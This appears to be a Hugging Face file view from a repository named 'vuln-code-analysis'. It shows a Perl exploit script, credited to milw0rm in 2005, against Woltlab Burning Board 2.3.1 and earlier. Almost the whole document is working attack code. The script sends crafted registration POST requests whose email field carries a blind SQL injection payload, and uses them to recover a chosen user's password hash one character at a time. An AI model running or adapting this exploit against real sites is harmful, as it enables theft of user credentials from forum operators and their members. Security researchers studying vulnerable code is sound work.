Hugging Face's logo

lilbool
/
vuln-code-analysis

Model card Files
xet
Community
vuln-code-analysis
File size: 3,298 Bytes
497f2f3
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
 
#!/usr/bin/perl



use strict;

use IO::Socket::INET;





$| = print "

Woltlab Burning Board <= 2.3.1 Exploit

Vulnerability discovered by GulfTech Security Research

Visit www.security-project.org

Exploit by deluxe89

----------

";







my $host = 'www.security-project.org';

my $path = '/wbb2/'; # path to the board

my $userid = 1; # the password hash will be from the user with this id

my $username = 'deluxe89'; # any username from the board

my $proxy = ''; # proxy, you can leave this empty

my $error = 'E-Mail-Adresse ist unzul&auml;ssig'; # use 'email address entered is already ta' for english boards





# proxy handling

my ($addr, $port) = ($proxy ne '') ? split(/:/, $proxy) : ($host, 80);

if($proxy ne '')

{

       print "[~] Using a proxy\n";

}

else

{

       print "[~] You're using NO proxy!\n";

       sleep(1);

}











#

# Get the hash

#



print "[~] Getting the hash. Please wait some minutes..\n[+] Hash: ";





my $hash = '';

for(my $i=1;$i<33;$i++)

{

       my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] Could not connect to server');



       if(&test($i, 96)) # buchstabe

       {

               for(my $c=97;$c<103;$c++)

               {

                       if(&test($i, $c, 1))

                       {

                               print pack('c', $c);

                               last;

                       }

               }

       }

       else # zahl

       {

               #print "0-4\n";

               for(my $c=48;$c<58;$c++)

               {

                       if(&test($i, $c, 1))

                       {

                               print pack('c', $c);

                               last;

                       }

               }

       }

}

print "\n";





sub test

{

       my ($i, $num, $g) = @_;



       my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('Could not connect to server');

       my $value = "sre4sdffr\@4g54asd5.org' OR (userid=$userid AND ascii(substring(password,$i,1))";

       $value .= ($g) ? '=' : '>';

       $value .= "$num)/*";

       my $data = "r_username=$username&r_email=$value&r_password=aaaaaaaa&r_confirmpassword=aaaaaaaa&r_homepage=&r_icq=&r_aim=&r_yim=&r_msn=&r_day=0&r_month=0&r_year=&r_gender=0&r_signature=&r_usertext=&field%5B1%5D=&field%5B2%5D=&field%5B3%5D=&r_invisible=0&r_usecookies=1&r_admincanemail=1&r_showemail=1&r_usercanemail=1&r_emailnotify=0&r_notificationperpm=0&r_receivepm=1&r_emailonpm=0&r_pmpopup=0&r_showsignatures=1&r_showavatars=1&r_showimages=1&r_daysprune=0&r_umaxposts=0&r_threadview=0&r_dateformat=d.m.Y&r_timeformat=H%3Ai&r_startweek=1&r_timezoneoffset=1&r_usewysiwyg=0&r_styleid=0&r_langid=0&send=send&sid=&disclaimer=viewed";



       print $sock "POST http://$host${path}register.php HTTP/1.1\r\nHost: $host\r\nConnection: Close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".length($data)."\r\n\r\n$data\r\n";





       while(<$sock>)

       {

               if($_ =~ m/$error/) { return 1; }

       }

       return 0;

}



# milw0rm.com [2005-05-20]